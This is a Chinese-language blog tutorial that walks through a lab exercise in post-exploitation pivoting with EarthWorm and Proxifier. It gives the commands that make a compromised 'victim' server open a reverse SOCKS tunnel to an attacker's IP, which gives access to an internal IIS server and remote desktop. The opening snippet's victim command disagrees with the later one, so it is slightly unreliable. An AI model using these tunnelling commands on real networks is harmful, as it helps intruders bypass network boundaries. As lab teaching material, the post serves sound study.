EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。
Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。

反向
攻击者
ew.exe -s rcsocks -l 1080 -e 8888
受害者win2008
ew.exe -s rcsocks -d 攻击者ip -e 8888

后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器

实验环境:

  • Windows Server 2008 R2 x64(192.168.70.128、10.1.1.1)
  • Windows Server 2003(10.1.1.2)
  • IIS服务器
  • EarthWorm
  • proxifier

后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器

环境搭建:

为win2008添加一块网卡,ip设为10.1.1.1
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器

将win2003的网络选成VM1
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器
将ip设为10.1.1.2
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器
将win2003的IIS服务器写上网页内容,并且保证win2008能够访问到
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器

两台机器开启均开启远程桌面
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器
将EarthWorm上传到win2008上
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器

后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器

模拟实验:

进入ew所在目录cd E:\学习资料\后渗透\day0318\ew
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器
输入ew_for_Win.exe -s rcsocks -l 1080 -e 8888
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器
win2008中输入ew.exe -s rssocks -d 192.168.0.14 -e 8888
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器
然后proxifier代理ip设为127.0.0.1端口为1080
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器
连接成功后会有大量数据传输
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器
此時远程桌面也是可以连接的
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器

相关文章:

  • 2021-11-18
  • 2022-02-26
  • 2022-01-11
  • 2021-11-30
  • 2021-05-19
  • 2021-07-25
猜你喜欢
  • 2021-06-23
  • 2021-11-27
  • 2021-05-04
  • 2021-06-21
  • 2021-05-28
  • 2021-08-12
  • 2022-12-23
相关资源
相似解决方案